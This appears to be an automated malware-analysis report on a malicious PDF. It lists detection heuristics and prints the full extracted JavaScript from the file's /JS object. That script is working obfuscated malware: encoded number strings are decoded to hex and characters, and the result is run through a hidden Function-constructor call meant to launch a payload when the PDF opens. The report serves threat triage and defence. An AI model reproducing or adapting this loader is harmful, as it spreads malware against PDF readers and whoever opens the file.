MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The presence of the artifact 'javascript_obj0099_000.js' and the 'PDF_IMAGE_ONLY_LURE' heuristic suggest the document is designed to trick the user into interacting with malicious content. The JavaScript is likely obfuscated and intended to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 6
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var asdfqwegqwegqewfa="G342G303G3"+"48G351G342G330G96G33"+"3G351G348G336G351G348G1"+"77G30G375G30G30G306G3"+"51G330G297G348"+"G315G333G33"+"0G96G306G31"+"5G360G285G315G348G1"+"20G36"+"3G291G342G345"+"G336G132G96G324G3"+"03G330G123G369G30"+"G96G96G"+"96G96G357G312G31"+"5G324G30"+"3G120G363G2"+"91G342G345G336G138G32"+"4G303G330G309G348G312G"+"96G126G96G150G96G180G9"+"6G324G303G330G123G3"+"69G30G96G96G96G96"+"G96G96G96G96G363G"+"291G342G34"+"5G336G96G12"+"9G183G96G363G291G3"+"42G345G336G177G30G96G9 … function qwaerasdf(asd){return String.fromCharCode(asd);} function hex2a(hex) { -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LUREPDF has 2 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0099_000.js |
pdf-javascript-stream | PDF /JS object 99 at offset 0x2D7F | 10775 bytes |
SHA-256: 144c61c4757d49304d3171f71f9cdbf9a6e5e87b8b95a3126594650a7b9a67f4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function rhjahahagk(){
var hgh="42G96G120G315"+"G183G144G17"+"7G96G315G96G180G"+"96G297G330"+"G348G177G96G31"+"5G129G129G123G"+"369G30G27G27"+"G294G351G306"+"G96G129G1"+"83G96G315G330G3"+"36G351G348G177"+"G30G27G375G30G27G342G"+"303G348G351G342G"+"330G96G294G351G30"+"6G177G30G375G30G"+"30G306G351G3"+"30G297G348G31"+"5G333G330G96G34"+"5G312G303G"+"324G324G297G33"+"3G300G303G120G32"+"4G333G291G300G255G"+"342G324G123G369"+"G30G27G354G291G3"+"42G96G34"+"5G297G333G300G303G96G1"+"83G96G102G207G198G147G"+"147G159G198G156G"+"198G153G153G201G171G1"+"62G162G168G147G2"+"01G171G144G144G"+"144G156G168"+"G144G153G156G144"+"G198G207G156G207G150G210"+"G195G207G198G144G159"+"G207G168G207G195G210G21"+"0G210G210G210G210G1"+"44G204G159G195G207"+"G159G207G156G207G156G20"+"4G159G150G204G168G144"+"G162G210G171G159G204G15"+"6G162G210G171G15"+"0G207G168G162G210G"+"171G150G210G1"+"68G162G210G16"+"8G195G207G201G16"+"2G210G195G150G201G156G"+"162G210G204G150G"+"168G150G204G204G195G201"+"G210G201G171G147G147G162G"+"162G210G195G1"+"47G204G168"+"G162G210G198G144G207G147"+"G171G201G20"+"7G159G144G207G162G2"+"10G171G162G201"+"G156G207G159G144G195"+"G198G162G204G"+"159G150G204G1"+"95G204G195G159G"+"156G171G207G159G144G2"+"01G204G159G153G210G207"+"G198G159G195G210G"+"156G204G201G147G162G1"+"71G144G207"+"G201G150G159G"+"150G210G207G195G"+"207G159G153G165G"+"195G156G144G210G147"+"G159G204G210G210"+"G198G171G147G144G153G"+"198G207G162G210"+"G171G162G201G1"+"44G207G159G144G195G"+"168G150G162G210G207"+"G168G195G195G162"+"G210G171G162G210G"+"168G207G159G144G195"+"G162G210G207G144G"+"162G195G207G159"+"G144G201G156G210G"+"198G210G198G165G150G165"+"G198G198G144G201G165G171"+"G147G198G147G1"+"98G147G198G144G"+"201G159G162G147"+"G198G147G198"+"G147G198G144G20"+"1G156G171G147G198"+"G147G198G147G198G"+"144G201G156G201G"+"147G198G147G198G147"+"G198G144G201G156G"+"165G147G198G147"+"G198G147G198"+"G144G201G165G195G147G198"+"G147G198G1"+"47G198G144G201"+"G165G204G147G198"+"G147G198G147G"+"198G144G201G165G"+"144G147G198"+"G147G198G147"+"G198G168G201"+"G168G168G204G165G"+"204G162G207G156G168G201G"+"171G165G168G201G168G"+"147G168G168G198G"+"144G147G198G"+"198G153G147G168"+"G162G204G150G147G144G"+"201G171G198G147G198G"+"147G198G147G198G144G"+"201G171G207G147"+"G198G147G198G147G"+"198G168G201G168"+"G198G168G195G207"+"G156G207G156G168G201G171"+"G147G171G162G168G168G"+"168G171G198G144G147"+"G198G198G153G147G"+"144G162G204G150G"+"147G144G201"+"G168G147G147";
function dec(input2) {var asfdsad ; var asdf =Fde(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
var ded="G198G147G198"+"G147G198G162G165G"+"150G153G207G144"+"G204G159G150G204G16"+"2G204G144G147G198"+"G147G198G159G198"+"G159G168G207G2"+"01G201G198G15"+"9G147G198G198G153"+"G147G156G195G14"+"7G207G198G159G195"+"G198G147G207G156"+"G204G201G147G162"+"G171G147G147G"+"153G150G153"+"G195G147G207G1"+"56G198G168G168G1"+"71G171G165G201G195G150"+"G153G195G147G207G"+"144G168G147G171G"+"201G168G147G207G156G1"+"62G204G144G14"+"7G168G150G159"+"G210G207G144G207"+"G156G168G150G195G2"+"10G168G150G162G165"+"G147G210G207G15"+"6G207G198G162G1"+"44G150G207G207G156"+"G207G156G2"+"07G156G204G159G150"+"G204G198G159G19"+"8G159G198G147G19"+"8G153G198G159G147G1"+"98G198G153G147G201"+"G162G165G147G201"+"G207G156G171G"+"147G144G147G16"+"8G207G207G144G168G2"+"01G207G156G210G156G20"+"7G156G207G156G168"+"G201G207G156G201G156G195"+"G195G207G156G168G"+"207G207G156"+"G147G198G198G153G153G"+"144G162G204G150G"+"150G204G159G150G204G"+"198G159G168G207G198G"+"156G168G207G207G"+"165G198G159G198G"+"159G168G201G207G"+"156G207G156G207G15"+"6G150G156G198G147G147G198"+"G198G153G153G201G"+"162G204G195G153G144G168G1"+"98G147G162G204G147G147G204G15"+"9G150G204G16"+"2G204G147G2"+"01G162G165G144G"+"201G207G144G198G159G198G"+"156G168G201G201"+"G144G210G156G207G156G"+"207G156G198G147G147"+"G198G171G153G144G"+"168G147G198G198G"+"153G153G168G207G165"+"G168G198G147G168G162"+"G165G171G198G147G168G207G"+"156G171G147G144G162"+"G162G204G147G"+"159G195G204G195G159"+"G204G204G144G2"+"04G171G144G207G201G195G159G"+"162G156G204G159G204G165"+"G204G204G144G204"+"G171G147G147G165G204"+"G159G150G204G198"+"G159G198G159G198G159"+"G147G198G171G153G144G168G147"+"G198G198G153G144G156G20"+"4G159G150G204G162G204G"+"147G201G162G165G14"+"4G201G207G144G201"+"G204G147G147G198G1"+"59G198G156G198G14"+"7G198G150G147G198"+"G171G153G144G168G"+"147G198G198G153G144"+"G144G147G198"+"G171G153G144G168G"+"147G198G198G153G1"+"44G201G168G150G159G210G"+"207G150G207G156G168"+"G150G195G210G168"+"G150G162G165G147G210G"+"207G156G171G144G2"+"04G162G204G15"+"9G150G204G198G1"+"71G168G207G207G1"+"47G198G159G198G15"+"9G198G147G198G159G"+"198G159G147G198G198"+"G153G147G144G"+"162G165G147G201G201"+"G156G171G195G144"+"G150G204G159G150G156G204"+"G159G150G204G195G156G207"+"G198G159G195G210G144"+"G207G153G2"+"04G201"+"G147G162G171"+"G147G147G153G150"+"G153G207G14"+"4G207G153G2"+"01G150G168G150"+"G204G171G";
function sadfjsadkl(str){return str.replace(/G/g,",");}
var ss="306G351G330G2"+"97G348G315G333G330"+"G96G312G303G360"+"G150G294G315G3"+"30G120G342G303"+"G345G123G96G369"+"G30G96G96G96"+"G96G354G291G3"+"42G96G315G177G"+"30G96G96G96G96"+"G354G291G342G9"+"6G309G96G183G96G23"+"1G291G348G312G138"+"G342G333G351G33"+"0G300G120G342G"+"303G345G138G3"+"24G303G330G309"+"G348G312G141"+"G156G123G177G30G"+"96G96G96G96G3"+"15G306G96G120G3"+"09G96G99G183G96G"+"120G342G303G345G1"+"38G324G303G330G3"+"09G348G312G141G"+"156G123G123G96G"+"342G303G345G96"+"G183G96G342G303"+"G345G96G129G9"+"6G102G144G144G102G1"+"77G30G96G96G96G"+"96G354G291G34"+"2G96G333G351G348"+"G96G183G96G102G102G177"+"G30G96G96G96G96"+"G306G333G342G96G1"+"20G315G183G144G177G9"+"6G315G180G342G"+"303G345G138G32"+"4G303G330G309G3"+"48G312G177G96G315G129"+"G183G156G123G96G369G"+"30G96G96G96G96G96G96G9"+"6G96G333G351G34"+"8G96G183G96G333"+"G351G348G96G12"+"9G96G102G111G351G"+"102G96G129G96"+"G342G303G345G13"+"8G345G351G294G"+"345G348G342G12"+"0G315G129G150G13"+"2G150G123G96"+"G129G96G342G"+"303G345G138G345"+"G351G294G345G348G"+"342G120G315G132G1"+"50G123G177G30G96G"+"96G96G96G375G3"+"0G96G96G96G96G3"+"42G303G348G3"+"51G342G330G96"+"G351G330G303G"+"345G297G291G336"+"G303G120G333G351G"+"348G123G177G30G"+"375G30G30G306G35"+"1G330G297G348G315G33"+"3G330G96G360G33"+"3G342G120G345G348G3"+"42G132G321G303G363G123"+"G96G369G30G27G354G29"+"1G342G96G333G351G"+"348G336G351G348G96G18"+"3G96G117G117G17"+"7G30G27G354G291G342"+"G96G330G303G360G"+"348G96G183G96G"+"117G117G177G30G27G3"+"54G291G342G96G"+"324G303G330G309G348G"+"312G96G183G96G34"+"5G348G342G138G324"+"G303G330G309G348"+"G312G177G30G27G306G333"+"G342G120G354G291G3"+"42G96G315G96G183G96G144"+"G177G96G315G96G180"+"G96G324G303G330G3"+"09G348G312G177G9"+"6G315G129G129G123G9"+"6G369G30G27G27G3"+"30G303G360G348G96"+"G183G96G336G291G3"+"42G345G303G219"+"G330G348G120G3"+"21G303G363G28"+"2G345G348G342G1"+"38G297G312G29"+"1G342G201G333G300"+"G303G195G348G120G3"+"15G123G123G138G"+"348G333G249G34"+"8G342G315G330G"+"309G120G147G162"+"G123G177G30G27G"+"27G315G306G120G3"+"30G303G360G348G1"+"38G324G303G330G3"+"09G348G312G96G180G96"+"G150G123G96G330"+"G303G360G348G96"+"G183G96G102G144"+"G102G129G330G303"+"G360G348G177G30G2"+"7G27G333G351G"+"348G336G351G348G96G"+"129G183G96G330G303G3"+"60G348G177G30G"+"27G375G30G27";
function Fde(str){var set='';var s='';var ee='';
str = sadfjsadkl(str);
str = str.split(",");
for(var i=0;i<str.length;i++){
ee=str[i]/3;
set+=asdfqwef(ee.toString(16));}
return set;
}
function ertenbui45(s){var adsfawheu = "0" ; return adsfawheu+s;}
function asdfqwef(eds){var set='';var s=eds;
if (s.length<2)
{set=ertenbui45(s);}
else{set=s;}
return set;
}
var asdfqwegqwegqewfa="G342G303G3"+"48G351G342G330G96G33"+"3G351G348G336G351G348G1"+"77G30G375G30G30G306G3"+"51G330G297G348"+"G315G333G33"+"0G96G306G31"+"5G360G285G315G348G1"+"20G36"+"3G291G342G345"+"G336G132G96G324G3"+"03G330G123G369G30"+"G96G96G"+"96G96G357G312G31"+"5G324G30"+"3G120G363G2"+"91G342G345G336G138G32"+"4G303G330G309G348G312G"+"96G126G96G150G96G180G9"+"6G324G303G330G123G3"+"69G30G96G96G96G96"+"G96G96G96G96G363G"+"291G342G34"+"5G336G96G12"+"9G183G96G363G291G3"+"42G345G336G177G30G96G96"+"G96G96G375G30G96G"+"96G96G96G34"+"2G303G348G351G342"+"G330G96G363G29"+"1G342G345G336G138G3"+"45G351G294G345G348G3"+"42G315G330G309G12"+"0G144G132G96G324G303G3"+"30G96G141G96G15"+"0G123G177G30"+"G375G30G306G351G330G"+"297G348G315G333G330G96"+"G312G303G291G336G24"+"9G336G342G29"+"1G363G120G345G348"+"G342G123G369G30G96G96"+"G96G96G342G333G348"+"G303G204G291G321G96G183G"+"96G345G348G342G138G32"+"4G303G330G309G348G3"+"12G96G126G96G150G17"+"7G30G96G96G96G96G30"+"0G291G321G246G333G34"+"8G303G183G96G102G2"+"76G351G17"+"1G144G171G144G102G1"+"77G30G96G96G96"+"G96G345G3"+"36G342G291"+"G363G96G183G96"+"G306G31"+"5G360G285G315G348G12"+"0G300G291G321G246G333G3"+"48G303G132G96G144"+"G360G150G144G144"+"G144G96G135G96G342"+"G333G348G303G204G291G32"+"1G123G177G30G96G"+"96G96G9"+"6G324G333G360G261G3"+"12G303G303G96G183G96G"+"345G348G342G"+"96G129G96G345G336G"+"342G291G363G177G30"+"G96G96G96G96G324"+"G333G360G261G312G30"+"3G303G96G183G96G"+"306G315G360G285G315G"+"348G120G324G333G360G26"+"1G312G303G303G132G96"+"G159G150G156G144G171G"+"168G123G177G30G27G327"+"G303G327G333G342G36"+"3G96G183G96G330G"+"303G357G96G195G342G3"+"42G291G363G120G123G"+"177G30G96G96G96G"+"96G306G333G342G12"+"0G315G183G144G1"+"77G96G315G96G180"+"G96G153G144G144"+"G177G96G315G129G"+"129G12"+"3G369G30G96G96G96G9"+"6G96G96G96G96G327G303"+"G327G333G342G"+"363G273G315G27"+"9G96G183G96G324G33"+"3G360G261G312G303G3"+"03G138G345G351G294G345G34"+"8G342G12"+"0G144G132G324G333G360G"+"261G312G303G303G1"+"38G324G303G330G309G"+"348G312G96G135"+"G96G147G96G123G96G129G96"+"G300G291G321"+"G246G333G348G3"+"03G177G30G"+"96G96G9"+"6G96G375G30G375G30G306"+"G351G330G297G3"+"48G315G333G330G96G345G3"+"48G342G285G342"+"G303G336G303G2"+"91G348G96G120G96G3"+"15G330G33"+"6G351G348G132G"+"96G297G330G3"+"48G96G123G96G369G30G2"+"7G354G291G3"+"42G96G294G351G"+"306G96G183G96G102G10"+"2G177G30G27G306G333G3";
function qwaerasdf(asd){return String.fromCharCode(asd);}
function hex2a(hex) {
var str = '';var zzz=qwaerasdf;
for (var i = 0; i < hex.length; i += 2){
var sssss = hex.substr(i,2);
str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
} return str;
}
ss+=asdfqwegqwegqewfa+hgh;
var dad=info.producer;
function adsfquifhiwuf(d,dd){return d+dd;}
ss+=adsfquifhiwuf(ded,dad);
var ss=dec(ss);
var dfawlfnewiojfiopwef = app.alert["adsfwefafdsfwefconstructorasdfwefasdf".substr(15,11)];
function asdfeaf(s){if (s==0){return false}else{return true}}
var susea=asdfeaf(1)+"";
var seasus=asdfeaf(0)+"";
var daeaefe="eafadsfjekafhjkavadfefafaef";
var dudilda=susea[(3+3)/2];
dudilda+=daeaefe[(16+16)/2];
dudilda+=seasus[((1+9)/5)-1];
dudilda+=seasus[(2+10)/6];
dfawlfnewiojfiopwef[dudilda](ss);
}
rhjahahagk();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.